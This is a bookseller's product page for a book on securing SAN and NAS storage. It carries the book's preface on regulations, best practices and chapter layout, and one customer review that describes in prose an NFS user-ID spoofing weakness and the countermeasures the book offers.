The completion of this book will provide a very detailed guide of securing storage and understanding attacks.

Regulations and Storage

Regulatory issues facing storage have created significant legal issues for many financial, e-commerce, and medical organizations. New acts and policies such as the Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley, Gramm-Leach Bliley Act (GLBA), SEC Rule 17a-4, DOD (Department of Defense) 5015, and California's SB1386 (Senate Bill 1386) are making a sizable impact on how the storage of data must be protected from unauthorized users, even if those unauthorized users are not hackers but internal employees. Furthermore, as internal audit groups and external IT auditors begin to understand that sensitive data is residing in the storage network/ devices (as opposed to servers or desktops), the focus will shift away from operating system security to storage networking security.

Government regulations primarily focus on security controls and auditing practices. A key issue for many storage networks, devices, and protocols is their lack of any security controls to protect data at-rest or in-flight. Additionally, government regulations don't decipher the difference between controls against outside attackers versus malicious internal employees. The fact that data is easier to compromise on a storage filer versus an operating system only adds to the storage security problem.

Regulations have highlighted an overlying issue of data protection. Data, whether it is financial data, non-public private information, or medical data, needs to be protected from unauthorized external and internal entities at all times. Government regulations have only helped raise the concerns that have existed since the first SAN or NAS network.

Best-Practice Benefits

Parts of certain chapters in this book are solely dedicated to best practices. Best practices are important in order to understand standard methods of secure deployment; however, they should not be used as inflexible guidelines. Implementation of security standards and practices will depend on the details and specifics of a storage network.

Best practices can be best described as items that are a prerequisite in order to deploy an acceptable amount of security in any given entity. Some of the sample best practices to secure storage are as follows:

  • High-level architecture (defense in depth)
  • Multi-layer architecture
  • Authentication with authorization
  • Encryption
  • Integrity
  • Auditing
  • Detailed implementation guidelines
  • Node hardening
  • Zoning
  • LUN masking
  • CT/CHAP authentication
  • SSL and IPSec encryption
  • At-rest (AES or SHA1) encryption
  • Management access

Who Should Read This Book

This book targets individuals who are responsible for IT infrastructure. Examples of these individuals are IT managers, storage administrators, network designers, architects, and engineers who want to evaluate security in storage architectures. It will also serve the needs of security consultants, engineers, architects, managers, auditors, trainers, and technical marketing managers who want to update their backgrounds in storage security.

The book is targeted toward readers who want to learn the common "how-tos" of securing storage. Readers requiring an essential reference guide can use the book as their primary resource. Generally speaking, this book is targeted for three types of individuals:

  • Individuals who are interested in establishing or expanding their knowledge of securing storage
  • Individuals who are interested in learning how to assess and audit their own storage networks
  • Individuals who are looking for best practices or new strategies for storage security

The book's audience will range from novice readers who are looking for the basics behind storage architectures, networking, and LANs, to moderately skilled administrators looking to gain information on Fibre Channel communication, iSCSI, and Internet Protocol.

Readers will benefit from the book in several different ways. First, readers will be able to remove the confusion from securing storage. Readers will be able to qualify the risk of their storage network with a clear description of the security issues in storage. Readers will also learn the security principles for designing, testing, and evaluating storage networks. Several chapters have hands-on self-assessment steps for critical security threats and vulnerabilities. Additionally, best practices security measures are discussed in the context of data availability, integrity, and compliance requirements. Finally, readers will understand the security concerns for storage and be able to determine the impact of each issue.

This book will provide readers with the data center's guide to analyzing, testing, and implement SAN and NAS security. This book will cover common "how-tos," provide the all-essential "reference steps," and provide recommendations for storage security best practices.

The book is not necessarily meant to be read from start to finish, but instead can be a quick reference, where individual chapters are self supporting without knowledge of prior chapters. For example, if a reader needs to understand how to secure a brocade Fibre Channel switch, he can turn directly to Chapter 4, "SANs: Zone and Switch Security." The book can provide insight for the following types of individuals:

  • Individuals interested in a practical method to secure SAN and NAS networks
  • Individuals interested in assessing the security of their existing SAN and NAS networks
  • Individuals interested in testing the security of their existing SAN and NAS networks
  • Individuals interested in expanding their security knowledge on emerging storage technologies, such as encryption, authentication, and management
  • Individuals interested in understanding how governmental regulations and compliance requirements affect storage

How This Book Is Organized

This book is organized into five parts consisting of fourteen chapters that include details on SAN security, NAS security, iSCSI security, storage defenses, polices, trends, and case studies.

The first three parts discuss core issues with SAN and NAS security, attacks against SAN and NAS devices, and SAN and NAS security solutions. These chapters target some of the most important topics in securing storage, as well as testing procedures for each attack class.

Chapter 1 begins with an overview of storage security, covering its basic premise, the problems encountered, typical uses, and future trends. Additionally, an overview of security and storage standards is discussed.

Chapters 2 through 4 discuss SAN security risks, including weaknesses of Fibre Channel (FC) and adjoining devices, such as switches and host-bus adapters (HBAs). Additionally, these chapters discuss SAN attacks, self-assessment steps (which allow readers to perform checks against their storage architecture), and mitigating solutions.

Chapters 5 and 7 are similar to Chapters 2 through 4, but focus on NAS architectures instead of SANs. Chapter 5 discusses the risks associated with NAS storage devices using IP protocols such as NFS and CIFS.

Chapters 6 and 7 discuss CIFS and NFS security issues, attacks, self-assessment steps, and mitigating solutions for storage architectures.

Chapter 8 discusses iSCSI security, including an overview of iSCSI communication, risks associated with iSCSI storage devices, and a discussion of the iSCSI attacks.

Part Four of the book focuses on storage defenses. Chapter 9 is a discussion on securing Fibre Channel SANs, Chapter 10 discusses the security of NFS/CIFS NAS, and Chapter 11 discusses the methods to secure iSCSI SANs. These chapters concentrate on how to take existing storage devices and ensure that they secure themselves. Part Five of the book shifts focus from SAN and NAS security risks and attacks, to larger storage security issues, such as emerging security technologies, regulations, and case studies. These three chapters discuss security from the adherence perspective, both from the governmental aspect as well as from best practices. Chapter 12 discusses some of the major governmental policies that affect storage architectures. Chapter 13 discusses how to audit your storage network based on the government compliances and security best practices. Finally, Chapter 14 is a discussion of real-world case studies in storage environments. Examples describe SAN and NAS architectures with the optimal amount of security and functionality.

How This Book Is Written

The book is written to address the topic of securing storage from a technology perspective. It does not discuss the proper paper policies and procedures that should be in place, nor does it describe the human processes of security as it pertains to storage. It also does not discuss storage security at a high level, but does specifically discuss how storage systems, networks, and protocols are affected by security. The key difference this book will offer is not to generically say storage has security problems and glaze over the details, but to start with the details first.

The book discusses the security weaknesses, threats, exploits, and attacks of storage systems, networks, and technologies in Chapters 2 through 8. After the discussion is complete, the book discusses the mitigating solutions of each prior attack identified in Chapters 9 through 14. The reason for a deep discussion of the attacks is because it is very difficult to discuss solutions only without any context of the problem. Although some vendors will not appreciate the fact that this book exposes problems, it is not written to embarrass any vendor or to prevent end-users from adopting storage devices, but instead to show organizations why certain security mitigations and solutions need to be in place when deploying a storage network. For example, after a virus infects a user's machine, it is easier to discuss why anti-virus software and host hardening procedures are very important items. The same idea applies to storage. Organizations will understand why taking active steps to secure storage is important after reviewing the attacks in Fibre Channel, iSCSI, CIFS, and NFS.

The book makes an attempt to classify the risk of each identified problem; however, the discussion is limited because risk is best measured when applied to specific scenarios and not generic examples. Many attacks shown in this book can be classified as low risk, but they are still discussed to expose the reader to the security problem. Conversely, many attacks shown in the book are also high risk and are shown to its full extent and detail.

The book is not vendor specific, but rather protocol specific (Fibre Channel and iSCSI for SANs and NFS and CIFS for IP NAS).

The book holds storage systems, networks, and protocols to the same standard of security as operating systems, wireless networks, and application security. Storage security strengths are discussed to show the reader the positive security aspects of storage; however, it also shows failed or poor security attempts in storage systems, networks, and protocols. The book does not give storage devices/networks any "breaks" since it is an emerging technology. Any system and/or network that controls a large portion of an organization's data must be held to the same high security standard expected from operating system vendors or even application product vendors.

Finally, the book is written in the context of full disclosure. The goal is to allow each reader to receive enough information to read, perform, and analyze each security problem and each discussion about the mitigating solution. This model should allow the reader to make risk acceptability decisions based on their own storage environment.

© Copyright Pearson Education. All rights reserved.

Read More Show Less

Customer Reviews

Be the first to write a review
( 0 )
Rating Distribution

5 Star

(0)

4 Star

(0)

3 Star

(0)

2 Star

(0)

1 Star

(0)

Your Rating:

Your Name: Create a Pen Name or

Barnes & Noble.com Review Rules

Our reader reviews allow you to share your comments on titles you liked, or didn't, with others. By submitting an online review, you are representing to Barnes & Noble.com that all information contained in your review is original and accurate in all respects, and that the submission of such content by you and the posting of such content by Barnes & Noble.com does not and will not violate the rights of any third party. Please follow the rules below to help ensure that your review can be posted.

Reviews by Our Customers Under the Age of 13

We highly value and respect everyone's opinion concerning the titles we offer. However, we cannot allow persons under the age of 13 to have accounts at BN.com or to post customer reviews. Please see our Terms of Use for more details.

What to exclude from your review:

Please do not write about reviews, commentary, or information posted on the product page. If you see any errors in the information on the product page, please send us an email.

Reviews should not contain any of the following:

  • - HTML tags, profanity, obscenities, vulgarities, or comments that defame anyone
  • - Time-sensitive information such as tour dates, signings, lectures, etc.
  • - Single-word reviews. Other people will read your review to discover why you liked or didn't like the title. Be descriptive.
  • - Comments focusing on the author or that may ruin the ending for others
  • - Phone numbers, addresses, URLs
  • - Pricing and availability information or alternative ordering information
  • - Advertisements or commercial solicitation

Reminder:

  • - By submitting a review, you grant to Barnes & Noble.com and its sublicensees the royalty-free, perpetual, irrevocable right and license to use the review in accordance with the Barnes & Noble.com Terms of Use.
  • - Barnes & Noble.com reserves the right not to post any review -- particularly those that do not follow the terms and conditions of these Rules. Barnes & Noble.com also reserves the right to remove any review at any time without notice.
  • - See Terms of Use for other conditions and disclaimers.
Search for Products You'd Like to Recommend

Recommend other products that relate to your review. Just search for them below and share!

Create a Pen Name

Your Pen Name is your unique identity on BN.com. It will appear on the reviews you write and other website activities. Your Pen Name cannot be edited, changed or deleted once submitted.

 
Your Pen Name can be any combination of alphanumeric characters (plus - and _), and must be at least two characters long.

Continue Anonymously
Sort by: Showing 1 Customer Reviews
  • Anonymous

    Posted December 18, 2005

    an unsettling book to some sysadmins

    The theme of this book is that Storage Area Networks and Network Attached Storage have been hitherto neglected with respect to securing their contents against unauthorised use. Dwivedi remarks that most sysadmins focus on maintaining and securing a corporate firewall. Along with regularly patching users' machines plus web servers. A common attitude is that SAN and NAS devices are at the very heart of the corporate network, and often cannot be directly accessed from outside the firewall. Dwivedi spends the bulk of his book debunking this idea. For one thing, he points out that a SAN or NAS box is a computer that has to run an operating system. Usually linux, unix or Microsoft. A vendor is very unlikely to write a custom operating system from scratch. Too expensive and takes too long to devise. So even if nothing else, you as a sysadmin should regularly patch those boxes if you can, when known bugs are found in their operating systems. These boxes should be no more exempt from patching than your other machines, even those behind the firewall. Another cause of concern is the sheer mass of data on a SAN or NAS box. Nowadays, likely to be many gigabytes. These are high value targets for an attacker. Whereas a typical user's desktop would have much smaller data sets. Plus, even with a firewall, there is always the possibility of an employee being an attacker. If she has a machine inside the firewall, then this already gives her a good start. Of course, you might reply that you 'lock down' your users' machines, so that they cannot get root access, for example. But the attacker with a Microsoft machine could boot off a Knoppix CD, for example, and go into a linux that sits only in memory, and for which she has root. Suppose now you have a NAS box exporting a file system via NFS to the attacker's machine, which is normally running Microsoft Windows. The author shows how the attacker can from her Knoppix OS mount the NAS file system and by changing her local passwd file, assume any user id and group id that gives her read access (and maybe write access) to any file in the foreign file system. These are the sort of attacks that you have to guard against. The book offers several chapters at its end describing possible countermeasures. The tone of the book is not alarmist. Rather, Dwivedi matter of factly walks through many attacks the above being just one case. He shows how using open source code freely available on the net, that an attacker could gleam useful data from your machines.

    Was this review helpful? Yes  No   Report this review
Sort by: Showing 1 Customer Reviews

If you find inappropriate content, please report it to Barnes & Noble
Why is this product inappropriate?
Comments (optional)